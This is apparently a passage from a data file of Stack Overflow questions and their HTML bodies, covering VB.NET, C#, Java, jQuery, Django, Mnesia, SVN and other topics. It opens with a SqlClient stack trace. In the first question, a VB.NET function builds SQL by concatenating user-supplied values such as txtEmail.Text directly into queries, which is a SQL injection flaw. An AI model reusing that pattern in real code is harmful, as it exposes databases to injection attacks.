  at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
  at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection)
  at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj)
  at System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj)
  at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async)
  at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(DbAsyncResult result, String methodName, Boolean sendToPipe)
  at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()
  at TestAPI.UpdateTicketValues(String srId) in D:\Webs\Internal\veritythree.com\SupportBeta\TestAPI.ascx.vb:line 216
  at TestAPI.Submit_Click(Object sender, EventArgs e) in D:\Webs\Internal\veritythree.com\SupportBeta\TestAPI.ascx.vb:line 170
  at System.Web.UI.WebControls.Button.OnClick(EventArgs e)
  at System.Web.UI.WebControls.Button.RaisePostBackEvent(String eventArgument)
  at System.Web.UI.WebControls.Button.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String eventArgument)
  at System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler sourceControl, String eventArgument)
  at System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData)
  at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) 0.517567748943243 0.511543 &lt;/p&gt;
&lt;p&gt;Here is my function: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public Function UpdateTicketValues(ByVal srId As String) As Boolean
    Dim result As Boolean
    Dim myCDataReader As System.Data.SqlClient.SqlDataReader
    Dim myUConn As New System.Data.SqlClient.SqlConnection
    Dim myCCmd As New System.Data.SqlClient.SqlCommand
    Dim myUCmd As New System.Data.SqlClient.SqlCommand
    Dim strSQL As String
    strSQL = "SELECT Contact_RecId, First_Name, Last_Name, PhoneNbr, Extension, Email FROM vti_ContactInformation " &amp;amp; _
             "WHERE Company_RecId = " &amp;amp; CoId &amp;amp; " AND Email = '" &amp;amp; txtEmail.Text &amp;amp; "'"
    myCConn.Open()
    myUConn = New System.Data.SqlClient.SqlConnection("Data Source=x;Initial Catalog=x;User Id=x;Password=x;Trusted_Connection=False")
    myUConn.Open()
    myCCmd.Connection = myCConn
    myCCmd.CommandText = strSQL
    myCDataReader = myCCmd.ExecuteReader
    If myCDataReader.Read() Then
        'Run update with contact information
        strSQL = "UPDATE SR_Service " &amp;amp; _
                 "SET Contact_RecId = " &amp;amp; myCDataReader.GetValue(0) &amp;amp; ", " &amp;amp; _
                 "    Contact_Name = '" &amp;amp; myCDataReader.GetValue(1) &amp;amp; " " &amp;amp; myCDataReader.GetValue(2) &amp;amp; "', " &amp;amp; _
                 "    PhoneNbr = '" &amp;amp; myCDataReader.GetValue(3) &amp;amp; "', " &amp;amp; _
                 "    Extension = '" &amp;amp; myCDataReader.GetValue(4) &amp;amp; "', " &amp;amp; _
                 "    Email_Address = '" &amp;amp; myCDataReader.GetValue(5) &amp;amp; "' " &amp;amp; _
                 "WHERE SR_Service_RecId = " &amp;amp; srId &amp;amp; " "
        myUCmd.Connection = myUConn
        myUCmd.CommandText = strSQL
        'myCCmd.ExecuteNonQuery()
        lblServiceRequest.Text = myUCmd.CommandText
        result = True
    Else
        myUCmd.CommandText = ""
        result = False
    End If
    If myUCmd.CommandText &amp;lt;&amp;gt; "" Then
        myUCmd.ExecuteNonQuery()
    End If
    myCConn.Close()
    myUConn.Close()
    Return result
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any help is appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ Library for image recognition: images containing words to string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a c++ library for taking an image and performing image recognition on it such that it can find letters based on a given font and/or font height? Even one that doesn't let you select a font would be nice (eg: readLetters(Image image).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Most efficient way to convert BCD to binary</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the code below to convert a 32 bit BCD value (supplied in two uint halves) to a uint binary value.&lt;/p&gt;
&lt;p&gt;The values supplied can be up to 0x9999, to form a maximum value of 0x99999999. &lt;/p&gt;
&lt;p&gt;Is there a better (ie. quicker) way to achieve this? &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    /// &amp;lt;summary&amp;gt;
    /// Convert two PLC words in BCD format (forming 8 digit number) into single binary integer.
    /// e.g. If Lower = 0x5678 and Upper = 0x1234, then Return is 12345678 decimal, or 0xbc614e.
    /// &amp;lt;/summary&amp;gt;
    /// &amp;lt;param name="lower"&amp;gt;Least significant 16 bits.&amp;lt;/param&amp;gt;
    /// &amp;lt;param name="upper"&amp;gt;Most significant 16 bits.&amp;lt;/param&amp;gt;
    /// &amp;lt;returns&amp;gt;32 bit unsigned integer.&amp;lt;/returns&amp;gt;
    /// &amp;lt;remarks&amp;gt;If the parameters supplied are invalid, returns zero.&amp;lt;/remarks&amp;gt;
    private static uint BCD2ToBin(uint lower, uint upper)
    {
        uint binVal = 0;
        if ((lower | upper) != 0)
        {
            int shift = 0;
            uint multiplier = 1;
            uint bcdVal = (upper &amp;lt;&amp;lt; 16) | lower;
            for (int i = 0; i &amp;lt; 8; i++)
            {
                uint digit = (bcdVal &amp;gt;&amp;gt; shift) &amp;amp; 0xf;
                if (digit &amp;gt; 9)
                {
                    binVal = 0;
                    break;
                }
                else
                {
                    binVal += digit * multiplier;
                    shift += 4;
                    multiplier *= 10;
                }
            }
        }
        return binVal;
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I get and set the 'read-only' property of an edit box?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I get and set the 'read-only' property of an edit box?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hide the uninstaller in Add/Remove Programs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating windows installer project using Visual Studio 2005.&lt;/p&gt;
&lt;p&gt;Is there an option make it so that my project does NOT have an uninstall option in Add/Remove programs?&lt;/p&gt;
&lt;p&gt;One of my customers has asked me to do this.. &lt;strong&gt;Here's Why&lt;/strong&gt;: Because the installer is a patch to an existing program. After uninstalling, the program no longer works because the patched files get uninstalled. Instead of figuring out a way to restore the replaced files (which we haven't been able to do with this installer), we're wondering if it is possible to disable the uninstall.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC Release Date</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody know if there is an official or estimated release date for the ASP.NET MVC framework?  I'm starting on a project that I hope to have completed by mid March and it would be a perfect candidate for the platform, but I don't want to release it under a framework that isn't completed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to pass information from java to c++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a java application I need to pass some info to a C++ program.  It has been suggested that I use some simple socket programming to do this.  Is this the best way?  If not what are the alternatives?  If so, how should I go about learning about socket programming? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to rename the Node running a mnesia Database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created a Mnesia database / Schema on machine1. The node was named mypl@machine1. I then moved all files to machine2, because machine1 broke down. Everything runs fine as long as the code is running with the name "mypl@machine1". Obviously this is somewhat confugsing, because it is now running on machine2.&lt;/p&gt;
&lt;p&gt;If I start Erlang with the node name "mypl@machine2" the Mnesia Database appears being empty.&lt;/p&gt;
&lt;p&gt;How do I rename the node in a Mnesia Database from machine1 to machine2?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A PHP API for retrieving Mail From Yahoo, GMail, Hotmail</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are a few APIs for grabbing the address book/contact list from the major providers of email.&lt;/p&gt;
&lt;p&gt;I was wondering do APIs like this exist for grabbing emails/messages received?&lt;/p&gt;
&lt;p&gt;Thanks all&lt;/p&gt;
&lt;h2&gt;EDIT&lt;/h2&gt;
&lt;p&gt;I am sure I can do this myself. However, I don't want to "re-invent" the wheel if someone has done it already. Probably better than I can since I am just a noob :P&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I need a fast key substitution algorithm for java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a string with replacement keys in it, how can I most efficiently replace these keys with runtime values, using &lt;strong&gt;Java&lt;/strong&gt;?  I need to do this often, fast, and on reasonably long strings (say, on average, 1-2kb).  The form of the keys is my choice, since I'm providing the templates here too.&lt;/p&gt;
&lt;p&gt;Here's an example (please don't get hung up on it being XML; I want to do this, if possible, cheaper than using XSL or DOM operations).  I'd want to replace all &lt;code&gt;@[^@]*?@&lt;/code&gt; patterns in this with property values from bean properties, true &lt;code&gt;Property&lt;/code&gt; properties, and some other sources.  The key here is &lt;em&gt;fast&lt;/em&gt;.  Any ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;envelope version="2.3"&amp;gt;
  &amp;lt;delivery_instructions&amp;gt;
    &amp;lt;delivery_channel&amp;gt;
      &amp;lt;channel_type&amp;gt;@CHANNEL_TYPE@&amp;lt;/channel_type&amp;gt;
    &amp;lt;/delivery_channel&amp;gt;
    &amp;lt;delivery_envelope&amp;gt;
      &amp;lt;chan_delivery_envelope&amp;gt;
    &amp;lt;queue_name&amp;gt;@ADDRESS@&amp;lt;/queue_name&amp;gt;
      &amp;lt;/chan_delivery_envelope&amp;gt;
    &amp;lt;/delivery_envelope&amp;gt;
  &amp;lt;/delivery_instructions&amp;gt;
  &amp;lt;composition_instructions&amp;gt;
    &amp;lt;mime_part content_type="application/xml"&amp;gt;
      &amp;lt;content&amp;gt;&amp;lt;external_uri&amp;gt;@URI@&amp;lt;/external_uri&amp;gt;&amp;lt;/content&amp;gt;
    &amp;lt;/mime_part&amp;gt;
  &amp;lt;/composition_instructions&amp;gt;
&amp;lt;/envelope&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The naive implementation is to use &lt;code&gt;String.replaceAll()&lt;/code&gt; but I can't help but think that's less than ideal.  If I can avoid adding new third-party dependencies, so much the better.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to eliminate post-render "flicker"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've tried my best to be a purist with my usage of Javascript/Ajax techniques, ensuring that all Ajax-y behavior is an enhancement of base functionality, while the site is also fully functional when Javascript is disabled.  However, this causes some problems.&lt;/p&gt;
&lt;p&gt;In some cases, a DOM node should only be visible when Javascript is enabled in the browser.  In other cases, it should only be visible when disabled.  Take for instance a submit button on a form that has a drop down with an onchange handler that auto-submits (using JQuery's form plugin):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form method="post" action="."&amp;gt;
    &amp;lt;label for="id_state"&amp;gt;State:&amp;lt;/label&amp;gt;
    &amp;lt;select name="state" id="id_state" onchange="$(this.form).ajaxSubmit(ajax_submit_handler);"&amp;gt;
        &amp;lt;option value="AL"&amp;gt;Alabama&amp;lt;/option&amp;gt;
        &amp;lt;option value="AK"&amp;gt;Alaska&amp;lt;/option&amp;gt;
    &amp;lt;/select&amp;gt;
    &amp;lt;input class="with_js_disabled" type="submit" value="OK" /&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the Javascript:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript"&amp;gt;
    $(document).ready(function()
    {
        $(".with_js_disabled").hide();
    });
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When Javascript is enabled, the submit button is not required (due to the onchange handler).  However, JQuery's $(document).ready function (and the more direct document.onload) is only called after the page has been fully loaded and rendered - hence, the submit button is initially displayed and a "flash" occurs when the Javascript is executed and the node's display is set to "none".&lt;/p&gt;
&lt;p&gt;I've accepted this as the cost of doing business, and haven't found a way around it.  But is there a technique I'm not aware of that will minimize the effect, or even outright eliminate it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;&amp;lt;noscript&amp;gt;&lt;/code&gt; solution mentioned by many people below seems promising, but isn't working for me on Safari.  However Prestaul's 2nd suggestion works beautifully:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;body&amp;gt;
    &amp;lt;script type="text/javascript"&amp;gt;
        document.body.className += ' has_js';
    &amp;lt;/script&amp;gt;
    &amp;lt;!-- the rest of your page --&amp;gt;
&amp;lt;/body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This can then be styled using straight CSS:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;body .js_enabled_only { display: none; }
body .js_disabled_only { display: block; }
body.has_js .js_enabled_only { display: block; }
body.has_js .js_disabled_only { display: none; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This second line is just for reference and can (and should) be removed to avoid circumstances where your element shouldn't be display:block.  Likewise, you may need different variations on the third line for other display styles.  But this solution is nice and clean, IMO, and in my tests entirely eliminates the flicker effect.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you manage your run once sql install scripts in subversion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working at a company that does several releases to production every year and during the build up to each release we gather up a collection of 1 time sql install scripts like table creation and dataports.&lt;/p&gt;
&lt;p&gt;The way things currently work is that after the release to production, we branch, tag then  we delete all 1 time scripts from subversion.  &lt;/p&gt;
&lt;p&gt;This seems to get the job done but to me it never seemed like the proper way to solve the problem.  &lt;/p&gt;
&lt;p&gt;Could you imagine deleting all your sourcecode every release and then writing patches for production?  &lt;/p&gt;
&lt;p&gt;The downsides that I see is if you want to reference and old script you have to checkout a tag or branch from subversion.&lt;/p&gt;
&lt;p&gt;Our SVN Repo currently looks something like this&lt;/p&gt;
&lt;p&gt;svnrepo/mywebsite/src
svnrepo/mywebsite/database/storedprocs
svnrepo/mywebsite/database/installscripts&lt;/p&gt;
&lt;p&gt;I was thinking that a more accurate way to model what we want to do in SVN is the following.&lt;/p&gt;
&lt;p&gt;Use an svn:externals attribute to point to the latest version.  Then after every release just point it to the latest.&lt;/p&gt;
&lt;p&gt;svnrepo/mywebsite/trunk/src/
svnrepo/mywebsite/trunk/src/database/installscripts/ 
-&gt; svnrepo/mywebsite/trunk/database/Release_3&lt;/p&gt;
&lt;p&gt;svnrepo/mywebsite/trunk/database/Release_1
svnrepo/mywebsite/trunk/database/Release_2
svnrepo/mywebsite/trunk/database/Release_3&lt;/p&gt;
&lt;p&gt;Using this model we no longer svn delete any sql scripts and enable a database developer to check out svnrepo/mywebsite/trunk/database/ and easily view all the database development that has occurred.&lt;/p&gt;
&lt;p&gt;Any comments on my ideas, the current structure, or the best way to manage this situation?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery $(document).ready() failing in IE6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Creates a timer to check for elements popping into the dom            
timer = setInterval(function ()
{          
    for (p in pixelTypes)
    {                             
        checkElems(pixelTypes[p]);
    }                            
}, 10);
// Add Document finished callback.
$(document).ready(function ()
{         
    // Document is loaded, so stop trying to find new pixels
    clearInterval(timer); 
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In Firefox, it works great, but in IE6, I get a "Object Expected" error on the $(document).ready line.&lt;/p&gt;
&lt;p&gt;I can't figure out what would cause IE6 to not recognize it, jquery is fully loaded by this point.&lt;/p&gt;
&lt;p&gt;Is this a known issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>High Level Graphics</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I did a lot of VRML+Java work in college and loved it, but I feel like it's not really a marketable skill.  Has anyone worked with a high level graphics API like open inventor, coin..etc that is actually in use to a degree that makes investing a lot of time in the API worthwhile for something more than a hobby?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When to exploit type inference in Haskell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm curious as to how often experienced Haskell programmers really use type inference in practice. I often see it praised as an advantage over the always-explicit declarations needed in certain other languages, but for some reason (perhaps just because I'm new) it "feels" right to write a type signature just about all the time... and I'm sure in some cases it really is required.&lt;/p&gt;
&lt;p&gt;Can some experienced Haskellers (Haskellites? Haskellizers?) provide some input?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>String conversions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a method which takes String argument.In some cases i want to pass int value to that method.For invoking that method i want to convert int into String.For that i am doing the following&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    aMethod(""+100);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One more option is &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    aMethod(String.valueOf(100));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Both are correct.I don't know which is appropriate?Which gives better performance?&lt;/p&gt;
&lt;p&gt;Mostly this is happen in GWT.In GWT for setting size of panels and widgets i want to do this.&lt;/p&gt;
&lt;p&gt;Can anyone give suggestion?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple Dynamic Graph Display for C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a simple graph layout library for C++. I want to embed the library into our visualizer based on wxWidgets. In summary, I am looking for something like &lt;a href="http://www.graphviz.org/Gallery.php"&gt;graphviz&lt;/a&gt;, except dynamic - that is when an event occurs, only the change in graph needs to be loaded, not the complete display. There is &lt;a href="http://www.dynagraph.org/"&gt;dynagraph&lt;/a&gt;, but it seems a dead project. I have previously been suggested to use VTK - but it is a heavyweight.&lt;/p&gt;
&lt;p&gt;I am looking for open source, non-copyleft kind of library available for commercial use (GPL is out, LGPL should be ok). I am open to suggestions that google won't give.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>django application configuration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm dying to get started Django but I'm really struggling with the initial setup. I have Python/MySql/Apache2.2/mod_python installed. Now I'm trying to create a proper directory structure and then update Django and Apache settings.py/httpd docs respectively. Specifically the location tag in the latter. Django and Python are based on simplicity but this is one huge oversight from the Django folks to not provide more guidance in this area. I had a basic page running in the Django dev server but could not get the stylesheet to load. So i decided to install mod_python and try to use apache in my dev environment and I'm even more frustrated. I can't seem find a good example anywhere on the web or in books regarding how to create a realistic directory structure and then based on that strucure, how to configure neccessary settings. Everything in tutorials is as usual not realistic or very helpful. Too simple. If someone here could share how they have their Django directory and settings configured that would be FANTASTIC!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How are POST and GET variables handled in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In PHP you can just use &lt;code&gt;$_POST&lt;/code&gt; for POST and &lt;code&gt;$_GET&lt;/code&gt; for GET (Query string) variables. What's the equivalent in Python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting base station name using J2ME</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can get the base station name using J2ME?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CURL usages in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had a doubt in CURL (PHP) . I want to login directly into a site using CURL. Is it possible, if possible please guide me. &lt;/p&gt;
&lt;p&gt;I tried with the following but its not working&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://username:password@myurl
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Embedding Fonts in PDF from LaTeX Source with pdflatex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to embed the fonts that I'm using in my TeX document in my output PDF.  I'm using pdflatex for TeX processing, and TextMate as my editor.&lt;/p&gt;
&lt;p&gt;I can't find any reference on how to embed the fonts I need in the PDF document.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC ViewData Null</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently creating an e-commerce site using C# ASP.NET MVC and have just come across a problem. On pages such as product pages and search results pages, I have to pass Lists of data from my controller to the ViewPage and that works just fine. However, a null reference exception occurs if the Viewdata equals null. It happens inside the viewpage when it loops through the ViewData and displays products or reviews.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;//ProductController.cs&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ActionResult Products_Sub(string category, int page)
{
ViewData["Products"] = database.GetByCategory(category, page);
return View();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;//ViewPage.cs -- product loop&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;ul&amp;gt; foreach (E_Store.Models.Product product in ViewData["Products"] as  
 List&amp;lt;e_store.models.product&amp;gt;)
 {%&amp;gt; 
 &amp;lt;li&amp;gt;
 &amp;lt;img alt="&amp;lt;%= product.Title%&amp;gt;" src="&amp;lt;%= product.Thumbnail %&amp;gt;" /&amp;gt; 
 &amp;lt;a href="/&amp;lt;%=product.Category %&amp;gt;/&amp;lt;%= product.SubCategory %&amp;gt;/&amp;lt;%= product.ASIN %&amp;gt;/1"&amp;gt;
 &amp;lt;%=product.Title%&amp;gt;&amp;lt;/a&amp;gt;
 &amp;lt;/li&amp;gt;
 }%&amp;gt;
 &amp;lt;/ul&amp;gt;    
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Null Reference Exception occurs when the following piece of code is reached:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;ul&amp;gt; foreach (E_Store.Models.Product product in ViewData["Products"] as
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I would like to know is the best way to catch this type of error if it does happen, without resorting to &lt;code&gt;if&lt;/code&gt; statements that check to see if it is null.&lt;/p&gt;
&lt;p&gt;If anyone knows of a good way of doing this I would really love to know.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>best deployment approach for VSeWSS 1.2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone suggest the best deployment approach for VSeWSS 1.2 based development?&lt;/p&gt;
&lt;p&gt;I have been working with this for more than 6 months now.. has anyone tried using WSPBuilder for this purpose?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use #include directive correctly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any material about how to use &lt;code&gt;#include&lt;/code&gt; correctly?
I didn't find any C/C++ text book that explains this usage in detail.
In formal project, I always get confused in dealing with it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Login to windows xp programatically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone heard that its possible to login to windows xp programatically,
I want to modify the way the Domain Controller authenticates the user and if the user authenticated in my special way it returns the user name and password to the service working on the client machine so it should login the user using its passed credentials from the DC without waiting for user to insert his original credentials.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can someone explain the difference between @Remote / @Local or only @Stateless in ejb?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I guess the topic says it.
I have tried googling this, but havent gotten the answer I am looking for.&lt;/p&gt;
&lt;p&gt;I have many EJB's with only @Stateless.
And sometimes I put @Local on them withouth really knowing why, and the benefits/cons. I also know I can put @Remote, but really dont know the difference.&lt;/p&gt;
&lt;p&gt;Hope someone can give a clear description, or point me somewhere that does.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code golf: combining multiple sorted lists into a single sorted list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Implement an algorithm to merge an arbitrary number of sorted lists into one sorted list. The aim is to create the smallest working programme, in whatever language you like.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;input:  ((1, 4, 7), (2, 5, 8), (3, 6, 9))
output: (1, 2, 3, 4, 5, 6, 7, 8, 9)
input:  ((1, 10), (), (2, 5, 6, 7))
output: (1, 2, 5, 6, 7, 10)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: solutions which concatenate the input lists then use a language-provided sort function are not in-keeping with the spirit of golf, and will not be accepted:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sorted(sum(lists,[])) # cheating: out of bounds!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Apart from anything else, your algorithm &lt;em&gt;should&lt;/em&gt; be (but doesn't have to be) a lot faster!&lt;/p&gt;
&lt;p&gt;Clearly state the language, any foibles and the character count. Only include meaningful characters in the count, but feel free to add whitespace to the code for artistic / readability purposes.&lt;/p&gt;
&lt;p&gt;To keep things tidy, suggest improvement in comments or by editing answers where appropriate, rather than creating a new answer for each "revision".&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: if I was submitting this question again, I would expand on the "no language provided sort" rule to be "don't concatenate all the lists then sort the result". Existing entries which do concatenate-then-sort are actually very interesting and compact, so I won't retro-actively introduce a rule they break, but feel free to work to the more restrictive spec in new submissions.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Inspired by &lt;a href="http://stackoverflow.com/questions/464342/combining-two-sorted-lists-in-python"&gt;http://stackoverflow.com/questions/464342/combining-two-sorted-lists-in-python&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parsing Functions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm making a script parser in python and I'm a little stuck. I am not quite sure how to parse a line for all its functions (or even just one function at a time) and then search for a function with that name, and if it exists, execute that function short of writing a massive list if elif else block....&lt;/p&gt;
&lt;p&gt;&lt;em&gt;EDIT&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This is for my own scripting language that i'm making. its nothing very complex, but i have a standard library of 8 functions or so that i need to be able to be run, how can i parse a line and run the function named in the line?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>in ssis how do I include a reference to a global variable from a script component?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a script component which I need to reference a global variable? I guess I can dtsconfig file. How do I set this and read it back out from my script component?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server security via TSQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to construct a transact sql script that will stop specified people from running certain commands against all databases: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;drop database, drop table or preferbly drop *
delete
update
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible?
The user will already have access to the server.&lt;/p&gt;
&lt;p&gt;Note : I am not trying to develop a security model for a server, or to prevent a malicious attack. This is an existing server where people may have a range of access rights through various Windows groups they belong to. I just want to know if there is a quick safeguard to prevent people from mistakenly running a command on the wrong server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Complex ASP.NET web applications and nant</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Working on an intranet where we have about 20 different web apps - some .net, some classic asp. &lt;/p&gt;
&lt;p&gt;Currently each .net app is its own solution.  There are advantages to this - we can build &amp;amp; deploy just one app, without affecting other apps, and all the apps share a session - but we can't use master pages, and there are real challenges using localization resources, shared css and js, etc.  Build &amp;amp; deployment is done completely manually, which is a real problem.&lt;/p&gt;
&lt;p&gt;I'm trying to set up a structure that will allow us to take advantage of VS2008 features, but still have the ability to update one app without affecting the others while still using features like master pages and localization resources, and sharing session between apps (so we can't set up virtual directories for each app).&lt;/p&gt;
&lt;p&gt;If I set up single solution that looks like:&lt;/p&gt;
&lt;pre&gt;
/Root
 - App_GlobalResources/
 - shared
   -- masterpages/
   -- css/
 - App1/
 - App2/
...
 - AppN/
..
 - ClassicASP1/
&lt;/pre&gt;
&lt;p&gt;then the problem is that the build just produces a single DLL (Root.dll) - this will simply not scale to 20+ apps, all of which have different development cycles.&lt;/p&gt;
&lt;p&gt;Is it possible (using nant, or some other build tool) to build multiple DLLs?  In this case, I'd like to end up with Root.dll (contains the global resources at least) and App1.dll and App2.dll.&lt;/p&gt;
&lt;p&gt;Any other suggestions or references I should look at?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does the iPhone developer program give me over and above simple registration as an iPhone developer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simply put; what does my $99 get me, that I can't already get for free?&lt;/p&gt;
&lt;p&gt;OK, OK, sounds like a dumb question, but the Apple site is not clear to me.&lt;/p&gt;
&lt;p&gt;My hunch is that you get the ability to submit apps to the app store for your 99, but you could get everything else for free, but it's not clear to me hence the question.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sharing C# code between Windows and Silverlight class libraries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We wrote a small Windows class library that implements extension methods for some standard types (strings initially). I placed this in a library so that any of our projects would be able to make use of it by simply referencing it and adding using XXX.Extensions.&lt;/p&gt;
&lt;p&gt;A problem came up when we wanted to use some of these methods in Silverlight. Although all the code was compatible, a Windows library can't be referenced in Silverlight so we created a Silverlight library that had links to the same class files and put compiler directives into the classes to allow different using declarations and namespaces. This worked fine until today when I added a new class to the Windows extensions library and realised that I would have to remember to link the class into the Silverlight library too.&lt;/p&gt;
